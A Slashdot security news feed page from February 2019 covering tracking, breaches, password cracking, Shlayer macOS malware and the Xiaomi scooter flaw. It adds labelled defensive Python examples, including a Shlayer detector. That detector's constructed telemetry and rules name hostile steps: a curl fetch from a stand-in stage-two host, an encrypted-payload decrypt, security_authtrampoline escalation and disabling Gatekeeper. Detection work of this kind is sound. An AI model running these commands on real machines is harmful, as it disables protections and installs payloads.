Feed aggregator

18,000 Android Apps Track Users By Violating Advertising ID Policies

Slashdot security articles - Fri, 02/15/2019 - 16:50
18,000 Android apps with tens or hundreds of millions of installs on the Google Play Store have been found to violate Google's Play Store Advertising ID policy guidance by collecting persistent device identifiers such as serial numbers, IMEI, WiFi MAC addresses, and SIM card serial numbers, and sending them to mobile-advertising-related domains alongside ad IDs. Bleeping Computer reports: AppCensus is an organization based in Berkeley, California, created by researchers from all over the world with expertise in a wide range of fields, from networking and privacy to security and usability. The project is supported by "grants from the National Science Foundation, the Department of Homeland Security, and the Data Transparency Lab." By highlighting this behavior, AppCensus shows that while users are offered the option to reset the advertising ID, doing so does not immediately give them a new "identity," because app developers can use a multitude of other identifiers to keep their tracking and targeting going; a persistent identifier sent alongside both the old and the new ad ID is all it takes to link the two. Google has not yet responded to a report AppCensus sent in September 2018 containing a list of 17,000 Android apps that send persistent identifiers together with ad IDs to various advertising networks, along with a list of 30 recipient mobile-advertising-related domains where the various IDs were being sent. While looking at the network packets sent between the apps and these 30 domains, AppCensus observed that "they are either being used to place ads in apps, or track user engagement with ads." In a statement to CNET, a Google spokesperson said: "We take these issues very seriously. Combining Ad ID with device identifiers for the purpose of ads personalization is strictly forbidden. We're constantly reviewing apps -- including those listed in the researcher's report -- and will take action when they do not comply with our policies." 
Some of the most popular applications found to be violating Google's Usage of Android Advertising ID policy include Clean Master, Subway Surfers, Flipboard, My Talking Tom, Temple Run 2, and Angry Birds Classic. The list goes on and on, and the last app in the "Top 20" list still has over 100 million installations.

Even Years Later, Twitter Doesn't Delete Your Direct Messages

Slashdot security articles - Fri, 02/15/2019 - 16:10
An anonymous reader quotes a report from TechCrunch: Twitter retains direct messages for years, including messages you and others have deleted, but also data sent to and from accounts that have been deactivated and suspended, according to security researcher Karan Saini. Saini found years-old messages, including ones exchanged with accounts that were no longer on Twitter, in an archive of his data downloaded through the website. He also reported a similar bug, found a year earlier but not disclosed until now, that allowed him to use a since-deprecated API to retrieve direct messages even after a message was deleted by both the sender and the recipient -- though the bug wasn't able to retrieve messages from suspended accounts. Direct messages once let users "unsend" messages from someone else's inbox, simply by deleting them from their own. Twitter changed this years ago, and now only allows a user to delete messages from their own account. "Others in the conversation will still be able to see direct messages or conversations that you have deleted," Twitter says in a help page. Twitter also says in its privacy policy that anyone wanting to leave the service can have their account "deactivated and then deleted." After a 30-day grace period, the account disappears, along with its data. But, in our tests, we could recover direct messages from years ago -- including old messages that had since been lost to suspended or deleted accounts. By downloading your account's data, it's possible to download all of the data Twitter stores on you. A Twitter spokesperson said the company was "looking into this further to ensure we have considered the entire scope of the issue."

Venezuela's Government Appears To be Trying To Hack Activists With Phishing Pages

Slashdot security articles - Fri, 02/15/2019 - 08:55
Hackers allegedly working for the embattled Venezuelan government tried to trick activists into giving away their passwords to popular services such as Gmail, Facebook, Twitter, and others, according to security researchers. From a report: Last week, the Venezuelan opposition leader Juan Guaido called for citizens to volunteer with the goal of helping international humanitarian organizations deliver aid into the country. President Nicolas Maduro is refusing to accept aid and, with the military's help, has erected barricades across a border bridge with Colombia. The volunteer efforts were organized around the website voluntariosxvenezuela.com. A week later, on February 11, someone registered an almost identical domain, voluntariosvenezuela[.]com. And on Wednesday, users in Venezuela who were trying to visit the original and official VoluntariosxVenezuela website were redirected to the newer one, according to security firm Kaspersky Lab as well as Venezuelan users on Twitter.

8-Character Windows NTLM Passwords Can Be Cracked In Under 2.5 Hours

Slashdot security articles - Fri, 02/15/2019 - 02:00
HashCat, an open-source password recovery tool, can now crack an eight-character Windows NTLM password hash in less than 2.5 hours. "Current password cracking benchmarks show that the minimum eight character password, no matter how complex, can be cracked in less than 2.5 hours" using a hardware rig built around eight Nvidia RTX 2080 Ti GPUs, explained a hacker who goes by the pseudonym Tinker in a Twitter DM conversation with The Register. "The eight character password is dead." From the report: It's dead at least in the context of hacking attacks on organizations that rely on Windows and Active Directory. NTLM is an old Microsoft authentication protocol that has since been replaced with Kerberos as the default for domain logons, though it remains enabled as a fallback in most environments. According to Tinker, the hash it relies on is still what Windows stores for local accounts and, in the NTDS.dit file, on Active Directory Domain Controllers. That stored value, the NT hash, is an unsalted MD4 of the UTF-16-LE encoded password, which is why a GPU rig can test it at hundreds of billions of guesses per second, and why one pass over the keyspace covers every account in a dump at once. Tinker estimates that buying the GPU power described would cost about $10,000; others have claimed the compute needed to crack an eight-character NTLM password hash can be rented in Amazon's cloud for just $25. NIST's latest guidelines say passwords should be at least eight characters long. Some online service providers don't even demand that much. When security researcher Troy Hunt examined the minimum password lengths at various websites last year, he found that while Google, Microsoft and Yahoo set the bar at eight, Facebook, LinkedIn and Twitter only required six. Tinker said the eight-character password was used as a benchmark because it's what many organizations recommend as the minimum password length, and many corporate IT policies reflect that guidance. So how long is long enough to sleep soundly until the next technical advance changes everything? 
Tinker recommends a random five-word passphrase, something along the lines of the four-word example popularized by the online comic XKCD, "correcthorsebatterystaple," or a random password of whatever maximum length the site allows, generated by a password manager, with two-factor authentication enabled in either case.

Hacker Who Stole 620 Million Records Strikes Again, Stealing 127 Million More

Slashdot security articles - Thu, 02/14/2019 - 14:03
An anonymous reader quotes a report from TechCrunch: A hacker who stole close to 620 million user records from 16 websites has stolen another 127 million records from eight more websites, TechCrunch has learned. The hacker, who listed the previously disclosed data for about $20,000 in bitcoin on a dark web marketplace, stole the data last year from several major sites -- some that had already been disclosed, like more than 151 million records from MyFitnessPal and 25 million records from Animoto. But several other hacked sites on the marketplace listing didn't know or hadn't disclosed yet -- such as 500px and Coffee Meets Bagel. The Register, which first reported the story, said the data included names, email addresses and scrambled passwords, and in some cases other login and account data -- though no financial data was included. Now the same hacker has eight additional marketplace entries after their original listings were pulled offline, including:
- 18 million records from travel booking site Ixigo
- 40 million records from live-video streaming site YouNow
- 57 million records from Houzz, which recently disclosed a data breach
- 1.8 million accounts from Ge.tt
- 450,000 records from cryptocurrency site Coinmama
- 4 million records from gaming site Roll20
- 5 million records from Stronghold Kingdoms, a multiplayer online game
- 1 million records from pet care delivery service PetFlow

Facebook Security Keeps a Detailed 'Lookout' List of Threats, Including Users and Former Employees, and Can Track Their Location

Slashdot security articles - Thu, 02/14/2019 - 12:07
An anonymous reader shares a report: In early 2018, a Facebook user made a public threat on the social network against one of the company's offices in Europe. Facebook picked up the threat, pulled the user's data and determined he was in the same country as the office he was targeting. The company informed the authorities about the threat and directed its security officers to be on the lookout for the user. "He made a veiled threat that 'Tomorrow everyone is going to pay' or something to that effect," a former Facebook security employee told CNBC. The incident is representative of the steps Facebook takes to keep its offices, executives and employees protected, according to nine former Facebook employees who spoke with CNBC. The company mines its social network for threatening comments, and in some cases uses its products to track the location of people it believes present a credible threat. Several of the former employees questioned the ethics of Facebook's security strategies, with one of them calling the tactics "very Big Brother-esque." Other former employees argue these security measures are justified by Facebook's reach and the intense emotions it can inspire. The company has 2.7 billion users across its services. That means that if just 0.01 percent of users make a threat, Facebook is still dealing with 270,000 potential security risks. [...] One of the tools Facebook uses to monitor threats is a "be on lookout" or "BOLO" list, which is updated approximately once a week. The list was created in 2008, an early employee in Facebook's physical security group told CNBC. It now contains hundreds of people, according to four former Facebook security employees who have left the company since 2016. Facebook notifies its security professionals anytime a new person is added to the BOLO list, sending out a report that includes information about the person, such as their name, photo, their general location and a short description of why they were added. 
In recent years, the security team even had a large monitor that displayed the faces of people on the list, according to a photo CNBC has seen and two people familiar with the matter, although Facebook says it no longer operates this monitor.

Personal Information of 14.8 Million 500px Users Exposed In Security Breach

Slashdot security articles - Thu, 02/14/2019 - 02:00
Photo-sharing service 500px has announced that it was the victim of a hack back in July 2018 and that personal data was exposed for all the roughly 14.8 million accounts that existed at the time. PetaPixel reports: In an email sent out to users and an announcement posted to its website, 500px states that it was only on February 8th, 2019, that its team learned of an unauthorized intrusion to its system that occurred on or around July 5th, 2018. The personal data that may have been stolen by the intruder includes first and last names, usernames, email addresses, password hashes (i.e. not plaintext passwords), location (i.e. city, state, country), birth date, and gender. The company has reset all 500px account passwords, so to get back into your account you'll need to pick a new one using the recovery email system. "At this time, there is no indication of unauthorized access to your account, and no evidence that other data associated with your user profile was affected, such as credit card information (which is not stored on our servers), if used to make any purchases, or any other sensitive personal information," 500px says. "We recommend you change your password on any other website or app on which you use a password that is the same as or similar to your password for your 500px account," 500px says.

Your GPS Devices May Stop Working On April 6 If You Don't Or Can't Update Firmware

Slashdot security articles - Wed, 02/13/2019 - 23:00
Zorro shares a report from The Register: Older satnavs and similar devices won't be able to use America's Global Positioning System properly after April 6 unless they've been suitably updated or designed to handle a looming epoch rollover. GPS signals from satellites include a timestamp, needed in part to calculate one's location, that stores the week number using ten binary bits. That means the week number can have 2^10, or 1,024, integer values, counting from zero to 1,023 in this case. Every 1,024 weeks, or roughly every 20 years, the counter rolls over from 1,023 to zero. The first Saturday in April will mark the end of the 1,024th week of the current epoch, after which the counter will spill over from 1,023 to zero. The last time the week number overflowed like this was in 1999, nearly two decades on from the first epoch in January 1980. You can see where this is going. If devices in use today are not designed or patched to handle this latest rollover, they will revert to an earlier year after that 1,024th week in April, causing attempts to calculate position to potentially fail. System and navigation data could even be corrupted, we're warned. U.S. Homeland Security explained the issue in a write-up this week. GPS.gov also notes that the newer CNAV and MNAV message formats use a 13-bit week number (8,192 weeks, about 157 years), so this issue shouldn't recur any time soon. The site recommends users consult the manufacturer of their equipment to make sure they have the proper updates in place.
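The arithmetic above is easy to get wrong in firmware, so here is an added Python example (not from The Register, DHS or GPS.gov) of the two ways a receiver can turn a 10-bit week field into a date: the naive way, which yields the 1980/1999 dates the article warns about once the counter wraps, and the usual fix, which picks the epoch whose date is not earlier than a reference date such as the firmware build date. The `not_before` parameter and the function names are mine; the constants are the published GPS epoch and field widths.

```python
from datetime import date, timedelta

GPS_EPOCH = date(1980, 1, 6)           # week 0, day 0 of GPS time
LEGACY_WEEK_BITS = 10                  # week field in the legacy navigation message
CNAV_WEEK_BITS = 13                    # week field in the newer CNAV/MNAV messages


def rollover_period_weeks(week_bits: int) -> int:
    """Number of weeks before a week counter of this width wraps to zero."""
    return 1 << week_bits


def _check(week_field: int, day_of_week: int, period: int) -> None:
    if not (0 <= week_field < period and 0 <= day_of_week <= 6):
        raise ValueError("field out of range")


def naive_gps_date(week_field: int, day_of_week: int) -> date:
    """A receiver that trusts the 10-bit field as an absolute week number.
    After a rollover this is off by 1,024 weeks (about 19.6 years)."""
    period = rollover_period_weeks(LEGACY_WEEK_BITS)
    _check(week_field, day_of_week, period)
    return GPS_EPOCH + timedelta(weeks=week_field, days=day_of_week)


def gps_date(week_field: int, day_of_week: int, not_before,
             week_bits: int = LEGACY_WEEK_BITS) -> date:
    """Rollover-safe decoding: advance by whole periods until the result is
    not earlier than `not_before` (a date or ISO string, typically the
    firmware build date). A device patched this way keeps working for one
    full period past that date, after which it needs a new build date."""
    if isinstance(not_before, str):
        not_before = date.fromisoformat(not_before)
    period = rollover_period_weeks(week_bits)
    _check(week_field, day_of_week, period)
    d = GPS_EPOCH + timedelta(weeks=week_field, days=day_of_week)
    while d < not_before:
        d += timedelta(weeks=period)
    return d


def rollover_dates(count: int, week_bits: int = LEGACY_WEEK_BITS):
    """First day of each successive epoch for a given field width."""
    period = rollover_period_weeks(week_bits)
    return [GPS_EPOCH + timedelta(weeks=period * n) for n in range(1, count + 1)]


if __name__ == "__main__":
    print("legacy rollovers:", [d.isoformat() for d in rollover_dates(3)])
    # Week field 0, Sunday, as decoded by a device built in 2019:
    print("naive:", naive_gps_date(0, 0), "| rollover-safe:", gps_date(0, 0, "2019-01-01"))
    print("first 13-bit rollover:", rollover_dates(1, week_bits=CNAV_WEEK_BITS)[0])
```

The reference-date trick is what most vendors' firmware updates amount to: the device cannot recover the missing high bits from the signal, so it assumes the current date is no earlier than the date the firmware shipped. That is also why a receiver fixed for the 1999 rollover can fail in 2019: its reference date was never advanced.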

Game of Thrones Hacker Worked With US Defector To Hack Air Force Employees of Iran

Slashdot security articles - Wed, 02/13/2019 - 16:50
An anonymous reader quotes a report from ZDNet: The U.S. Department of Justice today unsealed espionage-related charges against a former U.S. Air Force service member who defected to Iran and helped the country's hackers target her former Air Force colleagues. Besides the charges and an arrest warrant issued in the name of the former USAF service member, Monica Witt, the DOJ also indicted four Iranian hackers who allegedly carried out the cyber-attacks, acting on information provided by Witt. The most notable of the four is Behzad Mesri, whom U.S. authorities also charged in November 2017 with hacking HBO, stealing scripts for unaired episodes of the hit series Game of Thrones, and later attempting to extort HBO executives for $6 million. But at the heart of today's indictment stands Monica Elfriede Witt, 39, a former U.S. Air Force counter-intelligence special agent who specialized in Middle East operations, served in the Air Force between 1997 and 2008, and later worked as a DOD contractor until 2010 -- including for Booz Allen Hamilton, the same defense contractor where Edward Snowden worked. [...] The DOJ claims Witt has been working ever since with IRGC hacking units to craft and fine-tune cyber-operations against her former Air Force colleagues, some of whom she knew personally. [...] All five suspects named in the indictment are still at large, believed to be located in Iran. The DOJ says Witt now goes by the names Fatemah Zahra or Narges Witt.

Shlayer Malware Disables macOS Gatekeeper To Run Unsigned Payloads

Slashdot security articles - Wed, 02/13/2019 - 15:30
A new variant of the multi-stage Shlayer malware known to target macOS users has been observed in the wild, now capable of escalating privileges using a two-year-old technique and of disabling the Gatekeeper protection mechanism to run unsigned second-stage payloads. Bleeping Computer reports: This new Shlayer variant unearthed by Carbon Black's Threat Analysis Unit (TAU) targets all macOS releases up to the latest 10.14.3 Mojave, and arrives on the targets' machines as DMG, PKG, ISO, or ZIP files, some of them also signed with a valid Apple developer ID to make them look legitimate. Shlayer samples found by TAU also use malicious shell scripts to download additional payloads, just like older installments did, and, in the case of samples distributed as DMG images, will surreptitiously launch a .command script in the background after the user launches the fake Flash installer. The malicious script included in the DMG is base64-encoded and decrypts a second, AES-encrypted script, which is executed automatically once decrypted. Once it successfully downloads the second-stage malware payload, Shlayer escalates privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline, presented by Patrick Wardle in his Death by 1000 Installers talk at DEF CON 2017. The next step is to download extra payloads, which according to TAU all contain adware, and it makes sure they will be able to run on the compromised Mac by disabling the Gatekeeper protection mechanism. After this is accomplished, all extra payloads downloaded and launched by Shlayer are treated as approved software, because the OS no longer checks whether they are signed with an Apple developer ID. And just in case the malware is not able to disable Gatekeeper on the infected Mac, some of the second-stage payloads are also signed with valid developer IDs.
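Here is an added Python detector (not Carbon Black's code) that runs over constructed process-execution telemetry and flags the chain the report describes: a .command script launched off a mounted DMG, base64 decoding plus openssl decryption spawned under that script, security_authtrampoline with that script as an ancestor, and Gatekeeper being switched off. The report on this page does not name the command used to disable Gatekeeper; the rule assumes the documented `spctl --master-disable` switch. The `|`-separated log format, the paths and every event are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample telemetry, not real Carbon Black output. One process
# execution per line; fields separated by '|': ts|pid|ppid|uid|exe|args
SAMPLE_EVENTS = """\
2019-02-13T10:01:02Z|501|1|501|/usr/bin/hdiutil|attach /Users/jo/Downloads/FlashPlayer.dmg
2019-02-13T10:01:09Z|517|1|501|/bin/bash|/Volumes/Flash Player/.hidden/Install.command
2019-02-13T10:01:10Z|518|517|501|/usr/bin/base64|-D
2019-02-13T10:01:10Z|519|517|501|/usr/bin/openssl|enc -d -aes-256-cbc -k s3cr3t
2019-02-13T10:01:15Z|523|517|501|/usr/bin/curl|-s http://stage2.example.invalid/p
2019-02-13T10:01:20Z|531|517|0|/usr/libexec/security_authtrampoline|/tmp/stage2
2019-02-13T10:01:22Z|534|531|0|/usr/sbin/spctl|--master-disable
2019-02-13T10:05:00Z|540|1|501|/Applications/Safari.app/Contents/MacOS/Safari|
"""

SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh"}
TRAMPOLINE = "/usr/libexec/security_authtrampoline"
DMG_COMMAND = re.compile(r"^/Volumes/.*\.command(\s|$)")


def parse(text: str):
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, ppid, uid, exe, args = line.split("|", 5)
        events.append({"ts": ts, "pid": int(pid), "ppid": int(ppid),
                       "uid": int(uid), "exe": exe, "args": args})
    return events


def _ancestors(ev, by_pid):
    cur = by_pid.get(ev["ppid"])
    while cur is not None:
        yield cur
        cur = by_pid.get(cur["ppid"])


def _script_from_disk_image(ev) -> bool:
    """A shell running a .command script straight off a mounted image."""
    return ev["exe"] in SHELLS and DMG_COMMAND.match(ev["args"]) is not None


def detect(text: str):
    """Return sorted (rule, pid) pairs for the behaviours in the report."""
    events = parse(text)
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    hits = set()
    for ev in events:
        if _script_from_disk_image(ev):
            hits.add(("script_from_disk_image", ev["pid"]))
            # base64 decode and an openssl decrypt spawned by the same script:
            # the base64-wrapped, AES-encrypted second stage
            kids = children[ev["pid"]]
            decodes = any(k["exe"].endswith("/base64") for k in kids)
            decrypts = any(k["exe"].endswith("/openssl") and "enc" in k["args"].split()
                           and "-d" in k["args"].split() for k in kids)
            if decodes and decrypts:
                hits.add(("decode_decrypt_chain", ev["pid"]))
        # the privilege-escalation trampoline with the DMG script as an ancestor
        if ev["exe"] == TRAMPOLINE and any(_script_from_disk_image(a)
                                           for a in _ancestors(ev, by_pid)):
            hits.add(("auth_trampoline_from_disk_image", ev["pid"]))
        # Gatekeeper switched off (assumed: the documented spctl switch)
        if ev["exe"].endswith("/spctl") and "--master-disable" in ev["args"].split():
            hits.add(("gatekeeper_disabled", ev["pid"]))
    return sorted(hits)


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:34s} pid={pid}")
```

The parent-chain walk matters more than any single signature: a legitimate installer can call the trampoline, and an admin can run spctl, but neither normally descends from a hidden .command script on a disk image named after Flash. On a real fleet, also alert on `spctl --status` reporting "assessments disabled", since that is the state the payloads depend on.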

The Stolen Equifax Data Has Never Been Found, Experts Suspect a Spy Scheme

Slashdot security articles - Wed, 02/13/2019 - 14:50
An anonymous reader quotes a report from CNBC: On September 7, 2017, the world heard an alarming announcement from credit reporting giant Equifax: In a brazen cyber-attack, somebody had stolen sensitive personal information from more than 140 million people, nearly half the population of the U.S. It was the consumer data security scandal of the decade. The information included social security numbers, driver's license numbers, information from credit disputes and other personal details. CEO Richard Smith stepped down under fire. Lawmakers changed credit freeze laws and instilled new regulatory oversight of credit reporting agencies. Then, something unusual happened. The data disappeared. Completely. CNBC talked to eight experts, including data "hunters" who scour the dark web for stolen information, senior cybersecurity managers, top executives at financial institutions, senior intelligence officials who played a part in the investigation and consultants who helped support it. All of them agreed that a breach happened, and personal information from 143 million people was stolen. But none of them knows where the data is now. It has never appeared on any of the hundreds of underground websites selling stolen information. Security experts haven't seen the data used in any of the ways they'd expect after a theft like this -- not for impersonating victims, not for accessing other websites, nothing. Most experts familiar with the case now believe that the thieves were working for a foreign government, and are using the information not for financial gain, but to try to identify and recruit spies.

Google Play Store App Rejections Up 55% From Last Year, App Suspensions Up 66%

Slashdot security articles - Wed, 02/13/2019 - 14:10
In a year-in-review announcement today, Google said Play Store app rejections went up 55% last year after the OS maker tightened up its app review process. From a report: Similarly, stats for app suspensions also went up, by more than 66%, according to Google, which the company credited to its continued investment in "automated protections and human review processes that play critical roles in identifying and enforcing on bad apps." One of the most significant roles in the automated systems cited by Google in identifying malware is the Google Play Protect service, which is currently included by default with the official Play Store app. Google said this service now scans over 50 billion apps per day, and even goes as far as downloading and scanning every Android app it finds on the internet. [...] Play Store's automated systems are now getting better and better at detecting threats, so much so that Google is now seeing clear patterns. "We find that over 80% of severe policy violations are conducted by repeat offenders and abusive developer networks," Ahn said. "When malicious developers are banned, they often create new accounts or buy developer accounts on the black market in order to come back to Google Play."

Swiss E-voting Trial Offers $150,000 in Bug Bounties To Hackers

Slashdot security articles - Wed, 02/13/2019 - 08:45
The Swiss government is offering bug bounties of up to CHF 50,000 (around $50,000) to anyone who can expose vulnerabilities in its internet-based e-voting system in a test later this month. From a report: In total, 150,000 CHF (around $150,000) will be up for grabs for any white hat hackers who register for the "Public Intrusion Test" (PIT). The Swiss Post system will be open for a dummy election between February 24th and March 24th, the length of a typical Swiss federal vote, during which time any registered "white hat" hackers will be free to discover and report vulnerabilities. This PIT comes as the Swiss government is planning to expand its e-voting capabilities by October 2019 to two thirds of the 26 cantons that make up the Swiss Confederation. The country has conducted more than 300 trials of e-voting systems over the past 14 years, but current rules limit the share of electronic votes to 10 percent of the total for referendums and 30 percent for constitutional amendments. However, the expansion plans have been met with opposition from politicians who claim current e-voting systems are insecure, expensive, and prone to manipulation.

Facebook Glitch Lets You Search For Pictures of Your Female Friends, But Not Your Male Ones

Slashdot security articles - Tue, 02/12/2019 - 14:50
Belgian security researcher Inti De Ceukelaire has found an unusual glitch in Facebook's search function. Facebook lets you search for photos of your female friends, but refuses to let you look up pictures of your male friends. The Next Web has managed to replicate the glitch across several Facebook accounts. "When you type 'photos of my female friends' into the search bar, Facebook will return a seemingly-random selection of photos from your female friends," reports TNW. From the report: Switching out "female" with "male" returns something completely different. Instead of pictures of friends from within your social network, you're instead shown a selection of pictures from across the social network. In our experience, these came from accounts and groups we did not follow. Facebook will also ask if you meant to type "female," assuming you mistyped your query. If you're feeling an overwhelming sense of deja vu, you're not alone. The predecessor to Facebook was a deeply unsavory site called Facemash that allowed Harvard University students to rate their female colleagues based on perceived physical attractiveness. It's a far cry from the now-hugely popular social network site, used by millennials and grandparents alike. Facebook has desperately tried to shed this deeply questionable part of its history for something more saccharine and innocuous. [...] The main difference though is that this is almost certainly an innocent mistake, rather than the product of dorm-room shenanigans.

Researchers Use Intel SGX To Put Malware Beyond the Reach of Antivirus Software

Slashdot security articles - Tue, 02/12/2019 - 14:10
An anonymous reader shares an excerpt from an Ars Technica report: Researchers have found a way to run malicious code on systems with Intel processors in such a way that the malware can't be analyzed or identified by antivirus software, using the processor's own features to protect the bad code. As well as making malware in general harder to examine, bad actors could use this protection to, for example, write ransomware applications that never disclose their encryption keys in readable memory, making it substantially harder to recover from attacks. The research, performed at Graz University of Technology by Michael Schwarz, Samuel Weiser, and Daniel Gruss (one of the researchers behind last year's Spectre attack), uses a feature that Intel introduced with its Skylake processors called SGX ("Software Guard eXtensions"). SGX enables programs to carve out enclaves where both the code and the data the code works with are protected to ensure their confidentiality (nothing else on the system can spy on them) and integrity (any tampering with the code or data can be detected). The contents of an enclave are transparently encrypted every time they're written to RAM and decrypted upon being read. The processor governs access to the enclave memory: any attempt to access the enclave's memory from code outside the enclave is blocked; the decryption and encryption only occurs for the code within the enclave. SGX has been promoted as a solution to a range of security concerns when a developer wants to protect code, data, or both, from prying eyes. For example, an SGX enclave running on a cloud platform could be used to run custom proprietary algorithms, such that even the cloud provider cannot determine what the algorithms are doing. 
On a client computer, the SGX enclave could be used in a similar way to enforce DRM (digital rights management) restrictions; the decryption process and decryption keys that the DRM used could be held within the enclave, making them unreadable to the rest of the system. There are biometric products on the market that use SGX enclaves for processing the biometric data and securely storing it such that it can't be tampered with. SGX has been designed for this particular threat model: the enclave is trusted and contains something sensitive, but everything else (the application, the operating system, and even the hypervisor) is potentially hostile. While there have been attacks on this threat model (for example, improperly written SGX enclaves can be vulnerable to timing attacks or Meltdown-style attacks), it appears to be robust as long as certain best practices are followed.

Hackers Wipe US Servers of Email Provider VFEmail

Slashdot security articles - Tue, 02/12/2019 - 12:50
Hackers have breached the servers of email provider VFEmail.net and wiped the data from all its US servers, destroying all US customers' data in the process. From a report: The attack took place yesterday, February 11, and was detected after the company's site and webmail client went down without notice. "At this time, the attacker has formatted all the disks on every server," the company said yesterday. "Every VM is lost. Every file server is lost, every backup server is lost. This was more than a multi-password via SSH exploit, and there was no ransom. Just attack and destroy," VFEmail said. The company's staff is now working to recover user emails, but as things stand right now, all data for US customers appears to have been deleted for good and gone into /dev/null.

'You've Won $72 Million and a Mercedes Benz': Phone Scammer Gets 6 Years in Prison After He Made the Mistake of Calling William Webster, Ex-FBI and CIA Director

Slashdot security articles - Tue, 02/12/2019 - 11:31
Reader McGruber writes: The Washington Post has an amusing story about phone scammer Keniel A. Thomas, who made the mistake of calling William H. Webster. Thomas told 90-year-old Webster that he had won $72 million and a new Mercedes Benz in the Mega Millions lottery, but that he needed to send $50,000 in taxes and fees to get his money. Thomas also told Webster he'd done his research on the top winner. "You're a great man," the scammer cajoled. "You was a judge, you was an attorney, you was a basketball player, you were in the U.S. Navy, homeland security. I know everything about you. I even seen your photograph, and I seen your precious wife." Thomas's research didn't turn up everything. He didn't learn that the man he was calling was the former director of the FBI and the CIA, the only person ever to hold both jobs. And he didn't know that Webster would call him back the next day with the FBI listening in. Thomas was arrested in late 2017, after he landed in New York on a flight from Jamaica. He pleaded guilty in October and faced a prison term of 33 to 41 months under federal sentencing guidelines. But with Webster and his wife in the courtroom, Chief U.S. District Judge Beryl Howell on Friday added another 2 years to Thomas's sentence, giving him nearly six years to serve. Howell said that the scam qualified as "organized criminal activity" and that Thomas posed "a threat to a family member of the victim."

Xiaomi's Popular Electric Scooter M365 Can Be Hacked To Speed Up or Stop

Slashdot security articles - Tue, 02/12/2019 - 06:45
The fleets of electric scooters that have inundated cities are alarming enough as is. Now add cybersecurity concerns to the list: Researchers from the mobile security firm Zimperium are warning that Xiaomi's popular M365 scooter model has a worrying bug. From a report: The flaw could allow an attacker to remotely take over any of the scooters to control crucial things like, ahem, acceleration and braking. Rani Idan, Zimperium's director of software research, says he found and was able to exploit the flaw within hours of assessing the M365's security. His analysis found that the scooters contain three software components: battery management, firmware that coordinates between hardware and software, and a Bluetooth module that lets users communicate with their scooter via a smartphone app. The latter leaves the devices woefully exposed. Idan quickly found that he could connect to the scooter via Bluetooth without being asked to enter a password or otherwise authenticate. From there, he could go a step further and install firmware on the scooter without the system checking that this new software was an official, trusted Xiaomi update. This means that an attacker could easily put malware on a scooter, giving herself full command over it. "I was able to control any of the scooter features without authentication and install malicious firmware," Idan says. "An attacker could brake suddenly, or accelerate a person into traffic, or whatever the worst case scenario you can imagine."
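To show what "without the system checking that this new software was an official, trusted Xiaomi update" means in code, here is an added Python example (not Zimperium's or Xiaomi's code) using a hypothetical image layout of my own: an update handler that flashes whatever arrives, beside one that checks framing, authenticates header and payload together, and refuses version rollback. The HMAC key is a demo stand-in; a real device should carry a public key and verify an asymmetric signature, so that the key stored on the scooter can check updates but cannot be extracted and used to forge them.

```python
import hashlib
import hmac
import struct

# Hypothetical image layout for illustration (not Xiaomi's real format):
#   magic(4) | version(u32 LE) | payload length(u32 LE) | payload | tag(32)
MAGIC = b"FWIM"
HEADER = struct.Struct("<4sII")
TAG_LEN = 32
# Demo key only. Production firmware should verify an asymmetric signature;
# a symmetric key on the device can be extracted and used to forge updates.
DEMO_KEY = b"demo-key-do-not-ship"


def build_image(version: int, payload: bytes, key: bytes = DEMO_KEY) -> bytes:
    """Produce an authenticated image: header and payload, then a tag over both
    (the version is covered so it cannot be bumped on a stale payload)."""
    body = HEADER.pack(MAGIC, version, len(payload)) + payload
    return body + hmac.new(key, body, hashlib.sha256).digest()


def flash_unverified(image: bytes) -> bytes:
    """What the article describes: whatever arrives over Bluetooth is flashed."""
    _magic, _version, length = HEADER.unpack_from(image)
    return image[HEADER.size:HEADER.size + length]


def flash_verified(image: bytes, current_version: int, key: bytes = DEMO_KEY) -> bytes:
    """Hardened handler: check framing, authenticate, refuse rollback, then flash."""
    if len(image) < HEADER.size + TAG_LEN:
        raise ValueError("truncated image")
    body, tag = image[:-TAG_LEN], image[-TAG_LEN:]
    magic, version, length = HEADER.unpack_from(body)
    if magic != MAGIC or HEADER.size + length != len(body):
        raise ValueError("bad framing")
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        raise ValueError("authentication failed")
    if version <= current_version:               # anti-rollback
        raise ValueError("rollback refused")
    return body[HEADER.size:]


def accepts(image: bytes, current_version: int) -> bool:
    """True if the hardened handler would flash this image."""
    try:
        flash_verified(image, current_version)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    good = build_image(2, b"max_speed_kmh=25")
    tampered = bytearray(good)
    tampered[HEADER.size] ^= 0xFF            # flip one payload byte, keep the tag
    forged = build_image(3, b"max_speed_kmh=99", key=b"attacker-key")
    print("unverified flashes tampered image:", flash_unverified(bytes(tampered)))
    print("unverified flashes forged image:  ", flash_unverified(forged))
    print("verified accepts good:", accepts(good, 1))
    print("verified accepts tampered:", accepts(bytes(tampered), 1))
    print("verified accepts forged:", accepts(forged, 1))
    print("verified accepts replay of old version:", accepts(good, 2))
```

Note that the tag covers the header, not just the payload: without that, an attacker could re-wrap a genuine old image with a higher version number and walk past the rollback check with a signed but vulnerable build.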

Android Phones Can Be Hacked Remotely By Viewing Malicious PNG Image

Slashdot security articles - Mon, 02/11/2019 - 17:30
An innocent-looking image -- sent either via the internet or text -- could open your Android phone up to hacking. "While this certainly doesn't apply to all images, Google discovered that a maliciously crafted PNG image could be used to hijack a wide variety of Androids -- those running Android Nougat (7.0), Oreo (8.0), and even the latest Android OS Pie (9.0)," reports CSO Online. From the report: The latest bulletin lists 42 vulnerabilities in total -- 11 of which are rated as critical. The most severe critical flaw is in Framework; it "could enable a remote attacker using a specially crafted PNG file to execute arbitrary code within the context of a privileged process." Although Google had no reports of the security flaws being actively exploited, it remains to be seen if and how long it will take before attackers use the flaw in real-world attacks. Android owners were urged to patch as soon as security updates become available. But let's get real: Even if your Android still receives security updates, there's no telling how long it will be (weeks or months) before manufacturers and carriers get it together to push out the patches.

Doomsday Docker Security Hole Uncovered

Slashdot security articles - Mon, 02/11/2019 - 13:30
